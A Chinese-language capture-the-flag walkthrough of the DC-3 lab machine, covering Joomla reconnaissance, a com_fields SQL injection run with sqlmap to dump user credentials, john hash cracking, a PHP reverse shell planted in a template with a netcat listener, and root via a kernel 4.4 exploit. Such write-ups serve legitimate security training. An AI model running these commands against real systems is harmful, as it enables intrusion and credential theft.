DC-3

这个靶机有点难搞，尤其是最后提权

基础信息收集

先使用NMAP扫描了一下：

得到一个关键信息，即后台是Joomla。

相比之下，nikto就没有带来太多有用的信息了，不过倒是给我们爆出了许多目录：

基于Joomla深入

知道了后台是Joomla后，首先判断一下Joomla的版本：

joomscan -u 192.168.145.136

joomscan是Kali里有的，一开始不知道还去github找了下。

关键信息如下：

然后搜一下这个版本是否存在漏洞，居然搜出来一个SQL注入：

找到sqlmap 用法：

SQL注入

由于exploit-db已经提供了sqlmap的用法，因此后面的步骤相对简单，使用sqlmap跑出数据库：

sqlmap -u "http://192.168.145.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --dbs

跑出数据库joomladb的表：

sqlmap -u "http://192.168.145.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

跑出user表：

sqlmap -u "http://192.168.145.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns

然后再爆出username和password：

sqlmap -u "http://192.168.145.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump

然后使用john破一下hash密码：

john --crack-status pwd.hash

由于我已经crack过了，这里展示一下结果：

然后通过这个登录到系统。

Joomla后台

经Google，Joomla的模板可以修改。

在beez3模板的根目录下加一个shell的php文件，这个文件的内容可以参考：

/usr/share/webshells/php/php-reverse-shell.php

我这里用的就是这个。

稍微修改一下内容：

将IP改为自己主机的IP。

保存后访问的地址为：http://192.168.145.136/templates/beez3/shell.php

如果修改的是另一个模板，那就把beez3换成模板名。

在访问之前，在自己的主机上开一个端口监听接受反弹shell：

nc -nvlp 1234

然后访问该地址，成功拿到反弹shell：

提权

这里的提权折腾了很久，思维固定在DC-1和DC-2的类似提权手法，浪费了许多时间。

根据连接信息可以判断Linux版本，然后判断Ubuntu版本：

搜索一下：

searchsploit linux kernel 4.4

完美符合所有条件。

在exploit-db上找用法，然后：

去这个地址下载exploit.tar：https://bugs.chromium.org/p/project-zero/issues/detail?id=808

然后全部传到DC-3的服务器上，如果网络环境运行可以直接在服务器上wget从Github下。

然后编译执行：

成功拿到Root权：